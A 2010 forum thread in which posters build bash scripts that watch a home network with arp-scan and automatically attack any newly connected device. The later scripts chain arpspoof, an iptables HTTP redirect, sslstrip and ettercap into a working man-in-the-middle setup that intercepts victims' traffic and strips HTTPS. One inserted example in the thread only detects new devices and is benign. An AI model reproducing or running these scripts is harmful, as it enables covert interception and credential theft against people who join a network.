
Thread: arpscan network and action on new device

  1. #1 (Just burned his ISO; Join Date: Feb 2010; Posts: 13)

    Question: arpscan network and action on new device

    Hi guys,

    Anyone know of a premade script (pref. bash) that would scan the current subnet of an interface and, if a new device appears, perform an action?

    Basically I want to monitor my home network for new devices; if someone connects to my network I'm legally allowed to divert all of their HTTP requests.

    Cheers

  2. #2 (Just burned his ISO; Join Date: Feb 2010; Location: a swamp in canada; Posts: 12)


    Quote Originally Posted by phillips321:
        Hi guys,

        Anyone know of a premade script (pref. bash) that would scan the current subnet of an interface and, if a new device appears, perform an action?

        Basically I want to monitor my home network for new devices; if someone connects to my network I'm legally allowed to divert all of their HTTP requests.

        Cheers

    From reading your post it sounds as if you have left a wireless network open in the hope that someone will connect to it so you can sniff the traffic. If that's the case, I would recommend securing your network against unauthorized access before worrying about launching automated attacks.

    Anyway, I whipped this up quickly.

    Code:
    #!/bin/bash
    #--------------------------------------Fill in your info--------------------------------------------------
    varrouter=192.168.1.1
    varinterface=eth1
    #---------------------------------------------------------------------------------------------------------
    
    #-------------------Do not look at the following mess it will blind you ----------------------------------
    arp-scan -l | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > scan.txt
    varbadip=`diff -a scan.txt wl.txt | grep \< | sed -e 's/< //'`
    
    if [[ $badip != // ]]; then
    echo "New IP Address detected: " $varbadip
    echo "Router Address         : " $varrouter
    echo "Selected Interface     : " $varinterface
    arpspoof -i $varinterface -t $varbadip $varrouter
    fi
    #--------------------------------------------------------------------------------------------------------
    OK, so basically you need to create a whitelist named wl.txt, with each IP address on its own line:

    Code:
    192.168.1.1
    192.168.1.13
    192.168.1.56
    192.168.1.34
    Then you need to install arp-scan:

    Code:
    apt-get install arp-scan
    Then run the script; if it sees an address outside of the whitelist it will start ARP spoofing it.

    This is pretty much hacked together. I only wrote it for one new address on the network; 2 or more new addresses will most likely break it, but if I get some time this week I might work on it to improve my horrible bash skills.
    Last edited by mrshrek; 03-03-2010 at 12:30 PM.

  3. #3 (Just burned his ISO; Join Date: Feb 2010; Posts: 13)

    Re: arpscan network and action on new device

    Cheers for this.

    I took it upon myself to start from your code and throw something together.

    I don't use bash often, so this is a HUGE mess of code! Basically the script asks for an interface and an arp-scan interval.

    You can then call on a custom command each time a new device is found.

    Code:
    #!/bin/bash
    # monitor.sh v1.0
    #
    # This tool requires arp-scan to be installed and to be run as root
    #
    # ChangeLog....
    # Version 1.0 - First Release
    #################################################################
    # CHECKING FOR ROOT
    #################################################################
    if [ `echo -n $USER` != "root" ]
    then
    	echo "MESSAGE:"
    	echo "MESSAGE: ERROR: Please run as root!"
    	echo "MESSAGE:"
    	exit 1
    fi
    
    #################################################################
    # CHECKING TO SEE IF INTERFACE PROVIDED
    #################################################################
    if [ -z ${1} ]
    then
    	echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
    	echo "MESSAGE: `basename ${0}` eth0 60"
    	echo "ERROR: Please provide an interface to scan on"
    	exit 1
    else
    	INTERFACE="`echo "${1}" | cut -c 1-6`"
    	echo "MESSAGE: Monitoring ${1} for new devices"
    fi
    
    #################################################################
    # CHECKING TO SEE IF PROBE INTERVAL GIVEN
    #################################################################
    if [ -z ${2} ]
    then
    	echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
    	echo "MESSAGE: `basename ${0}` eth0 60"
    	echo "ERROR: Please provide a scan interval in seconds"
    	exit 1
    else
    	INTERVAL="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-4`"
    	echo "MESSAGE: Scanning once every ${INTERVAL} seconds"
    fi
    
    #################################################################
    # IDENTIFY IP, GATEWAY and SUBNET
    #################################################################
    IPADDR=`ifconfig ${INTERFACE} | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
    SUBNET=`ifconfig ${INTERFACE} | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
    GATEWAY=`route -n | grep ${INTERFACE} | cut -d' ' -f 1 | grep -v 0.0.0.0 | grep -v 169.254`
    echo "MESSAGE: interface=${INTERFACE} gateway=${GATEWAY} ip.addr=${IPADDR} subnet=${SUBNET}"
    
    #################################################################
    # DELETE FILES FROM PREVIOUS SCANS
    #################################################################
    rm -rf SCAN.txt WHITELIST.txt
    
    #################################################################
    # PERFORMING FIRST SCAN TO CREATE WHITELIST
    #################################################################
    arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > WHITELIST.txt
    
    if [[ -s WHITELIST.txt ]] ; then
    	echo "MESSAGE: The following devices were found and will be excluded from this monitor."
    	cat WHITELIST.txt
    else
    	echo "MESSAGE: No IPs found during arp-scan, are you sure your interface is up?."
    	exit 1
    fi ;
    
    #################################################################
    # THIS IS THE MONITORING BIT
    #################################################################
    while true; do
    	arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > SCAN.txt
    	sort SCAN.txt > tmp.txt
    	cat tmp.txt > SCAN.txt
    	rm tmp.txt
    	NEWIP=`diff -a SCAN.txt WHITELIST.txt | grep \< | sed -e 's/< //'`
    	if [ ! -z ${NEWIP}  ]; then
    		echo "MESSAGE: New IP detected!!! ${NEWIP}"
    		echo ${NEWIP} >> WHITELIST.txt
    		#################################################################
    		# To run a command when new device found please enter it here
    		xterm -e "nmap ${NEWIP}"
    		#################################################################		
    	fi
    	sort WHITELIST.txt > tmp.txt
    	cat tmp.txt > WHITELIST.txt
    	rm tmp.txt
    	sleep ${INTERVAL}
    done
    
    exit 0
    To exit the while loop you need to Ctrl-C. Any idea on a better way to allow the user to exit the while loop? Then I'll be able to delete the files created during the script (SCAN.txt and WHITELIST.txt).

    Also, any idea how I can improve this bit:

    Code:
    sort WHITELIST.txt > tmp.txt
    cat tmp.txt > WHITELIST.txt
    rm tmp.txt
    and

    Code:
    sort SCAN.txt > tmp.txt
    cat tmp.txt > SCAN.txt
    rm tmp.txt
    Cheers
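    An added example, not code from this thread: a defender's version of the detection step in the monitor scripts above. It keys the whitelist on MAC address instead of IP, so a DHCP lease change alone does not alert, replaces the diff/tmp-file dance with comm, and uses a trap so Ctrl-C still cleans up the temp files. The arp-scan output and the whitelist are constructed samples; the arp-scan line format (ip, mac, vendor) is assumed.

```shell
#!/bin/bash
# Added example (not from the thread): whitelist-based new-device detection
# over arp-scan output, keyed by MAC, with cleanup on exit or Ctrl-C.
set -u

# Parse "arp-scan -l" output on stdin into sorted "mac ip" pairs.
# Only lines whose first field is a dotted-quad IP are kept, so the header
# lines and the trailing packet summary drop out (awk splits on tabs or spaces).
parse_arpscan() {
    awk '$1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ { print tolower($2), $1 }' | sort -u
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT INT TERM   # temp files go away even on Ctrl-C

# Print MACs present in the scan file ($1) but absent from the whitelist ($2).
# comm needs sorted input; -23 keeps lines unique to the first file.
new_devices() {
    cut -d' ' -f1 "$1" | sort -u > "$WORK/scan_macs"
    sort -u "$2" > "$WORK/wl_macs"
    comm -23 "$WORK/scan_macs" "$WORK/wl_macs"
}

# Constructed sample scan (no real hosts): ":01" is known, ":02" is known but
# moved to a new lease, ":03" has never been seen before.
SAMPLE_SCAN='Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan with 256 hosts
192.168.1.1   aa:bb:cc:00:00:01   Example Router Vendor
192.168.1.77  aa:bb:cc:00:00:02   Example Laptop Vendor
192.168.1.90  aa:bb:cc:00:00:03   Example Phone Vendor

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan: 256 hosts scanned in 1.5 seconds'

# Constructed whitelist of known MACs; an IP change alone will not alert.
printf '%s\n' aa:bb:cc:00:00:01 aa:bb:cc:00:00:02 > "$WORK/whitelist"
printf '%s\n' "$SAMPLE_SCAN" | parse_arpscan > "$WORK/scan"

# Log every unknown device with its current IP and return the count on stdout.
report_new() {
    n=0
    new_devices "$WORK/scan" "$WORK/whitelist" > "$WORK/new"
    while read -r mac; do
        ip=$(awk -v m="$mac" '$1 == m { print $2 }' "$WORK/scan")
        echo "ALERT: unknown device $mac at $ip" >&2
        n=$((n + 1))
    done < "$WORK/new"
    echo "$n"
}
# Live use: replace SAMPLE_SCAN with  arp-scan -l -I "$IFACE" | parse_arpscan
```

    Running it prints one ALERT line for aa:bb:cc:00:00:03 and returns a count of 1; appending an alerted MAC to the whitelist file is the equivalent of the `echo ${NEWIP} >> WHITELIST.txt` step above.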

  4. #4 (Just burned his ISO; Join Date: Feb 2010; Location: a swamp in canada; Posts: 12)

    Re: arpscan network and action on new device

    Edited to fix my long-winded post and fix a few errors.

    monitor.sh v1.0.1

    Code:
    #!/bin/bash
    # monitor.sh v1.0.1  
    # creator: phillips321
    # This tool requires arp-scan to be installed and to be run as root
    #
    # ChangeLog....
    # Version 1.0.1 - Minor fixes
    # Version 1.0   - First Release
    #################################################################
    # CHECKING FOR ROOT
    #################################################################
    if [ `echo -n $USER` != "root" ]
    then
            echo "MESSAGE:"
            echo "MESSAGE: ERROR: Please run as root!"
            echo "MESSAGE:"
            exit 1
    fi
    
    #################################################################
    # CHECKING TO SEE IF INTERFACE PROVIDED
    #################################################################
    if [ -z ${1} ]
    then
            echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
            echo "MESSAGE: `basename ${0}` eth0 60"
            echo "ERROR: Please provide an interface to scan on"
            exit 1
    else
            INTERFACE="`echo "${1}" | cut -c 1-6`"
            echo "MESSAGE: Monitoring ${1} for new devices"
    fi
    
    #################################################################
    # CHECKING TO SEE IF PROBE INTERVAL GIVEN
    #################################################################
    if [ -z ${2} ]
    then
            echo "MESSAGE: Usage: `basename ${0}` [interface] [time between scans (secs)]"
            echo "MESSAGE: `basename ${0}` eth0 60"
            echo "ERROR: Please provide a scan interval in seconds"
            exit 1
    else
            INTERVAL="`echo "${2}" | tr -cd '[:digit:]' | cut -c 1-4`"
            echo "MESSAGE: Scanning once every ${INTERVAL} seconds"
    fi
    
    #################################################################
    # IDENTIFY IP, GATEWAY and SUBNET
    #################################################################
    IPADDR=`ifconfig ${INTERFACE} | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
    SUBNET=`ifconfig ${INTERFACE} | grep 'Mask:'| grep -v '127.0.0.1' | cut -d: -f4`
    GATEWAY=`route -n | grep ${INTERFACE} | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
    echo "MESSAGE: interface=${INTERFACE} gateway=${GATEWAY} ip.addr=${IPADDR} subnet=${SUBNET}"
    
    #################################################################
    # DELETE FILES FROM PREVIOUS SCANS
    #################################################################
    rm -rf SCAN.txt WHITELIST.txt
    
    #################################################################
    # PERFORMING FIRST SCAN TO CREATE WHITELIST
    #################################################################
    arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > WHITELIST.txt
    
    if [[ -s WHITELIST.txt ]] ; then
            echo "MESSAGE: The following devices were found and will be excluded from this monitor."
            cat WHITELIST.txt
    else
            echo "MESSAGE: No IPs found during arp-scan, are you sure your interface is up?."
            exit 1
    fi ;
    
    #################################################################
    # THIS IS THE MONITORING BIT
    #################################################################
    while true; do
            arp-scan -l -I ${INTERFACE} | sed -e '1,2d' -e '/^$/,+2 d' -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 1 > SCAN.txt
            sort -n -t '.' +3 -0 -o SCAN.txt SCAN.txt
            NEWIP=`diff -a SCAN.txt WHITELIST.txt | grep \< | sed -e 's/< //'`
            if [ ! -z ${NEWIP}  ]; then
                    echo "MESSAGE: New IP detected!!! ${NEWIP}"
                    echo ${NEWIP} >> WHITELIST.txt
                    #################################################################
                    # To run a command when new device found please enter it here
                    konsole -e ./quickstrip.sh ${INTERFACE} ${NEWIP} &
                    # xterm -e "nmap ${NEWIP}"
                    #################################################################
            fi
            sort -n -t '.' +3 -0 -o WHITELIST.txt WHITELIST.txt
            read -t ${INTERVAL} && break
    done
    
    rm -rf WHITELIST.txt SCAN.txt
    
    exit 0
    quickstrip v1.0.1

    Code:
    #!/bin/bash
    # quickstrip.sh v1.0.1
    # creator: mrshrek
    # This tool requires arpspoof ettercap and sslstrip to be installed
    # It also must be run as root.
    #
    # Designed to be used with Phillips321's monitor.sh or on its own
    #
    # ChangeLog...
    # Version 1.0.1 - Minor fixes, checked for instances of sslstrip
    #               - and ettercap so it wouldnt fail when called
    #               - multiple times by monitor.sh
    #               - also added cleanup script for multiple instances.
    #
    # Version 1.0   - First Release
    #################################################################
    # CHECKING FOR ROOT
    #################################################################
    if [ `echo -n $USER` != "root" ]
    then
            echo "ERROR: Please run as root!"
            exit 1
    fi
    #################################################################
    # CHECK TO SEE IF THERE IS AN OLD CLEANUP SCRIPT
    #################################################################
    if [ -a sslcleanup.sh ]
      then
        rm -rf sslcleanup.sh
    fi
    #################################################################
    # CHECK FOR ARGS
    #################################################################
    if [ -z $1 ] || [ -z $2 ]
      then
        echo "Usage: ./quickstrip.sh INTERFACE IPADDRESS"
        exit 1
      else
    #################################################################
    # SETUP IP FORWARDING AND IPTABLES
    #################################################################
        IP_FORWARD=`cat /proc/sys/net/ipv4/ip_forward`
        if [ $IP_FORWARD != 1 ]
          then
            echo 1 > /proc/sys/net/ipv4/ip_forward
        fi
        iptables -t nat -A PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000
    #################################################################
    # SETUP ARPSPOOF, ETTERCAP AND SSLSTRIP.  CHECK OTHER INSTANCES
    #################################################################
        GATEWAY=`route -n | grep $1 | grep UG | sed -e 's/[ \t][ \t]*/#/g' | cut -d '#' -f 2`
        ETTERPID=`ps aux | grep "ettercap -T -q -i" | grep -v grep | sed -e "s/[ /t][ /t]*/#/g" | cut -d '#' -f 2`
        SSLPID=`ps aux | grep "sslstrip" | grep "python" | sed -e "s/[ /t][ /t]*/#/g" | cut -d '#' -f 2`
    
        konsole -e arpspoof -i $1 -t $2 $GATEWAY &
        if [ -z $SSLPID ]
          then
            konsole -e sslstrip -a -k -f &
        fi
        if [ -z $ETTERPID ]
          then
            ettercap -T -q -i $1
        fi
    fi
    ##################################################################
    # CLEAN UP THE MESS IF WE ARE ALL DONE.
    ##################################################################
    if [ -z $ETTERPID ] || [ -z $SSLPID ]
      then
        iptables -t nat -D PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000
        echo 0 > /proc/sys/net/ipv4/ip_forward
        rm sslstrip.log
      else
        echo "SSLSTRIP or ETTERCAP still running."
        echo "To clean up please run: sslcleanup.sh"
        if [ -a sslcleanup.sh ]
          then
            exit 0
        else
          echo "iptables -t nat -D PREROUTING -i $1 -p tcp --dport 80 -j REDIRECT --to-port 10000" > sslcleanup.sh
          echo "echo 0 > /proc/sys/net/ipv4/ip_forward" >> sslcleanup.sh
          echo "rm sslstrip.log" >> sslcleanup.sh
          chmod +x sslcleanup.sh
        fi
    fi
    Last edited by mrshrek; 03-05-2010 at 06:27 PM.
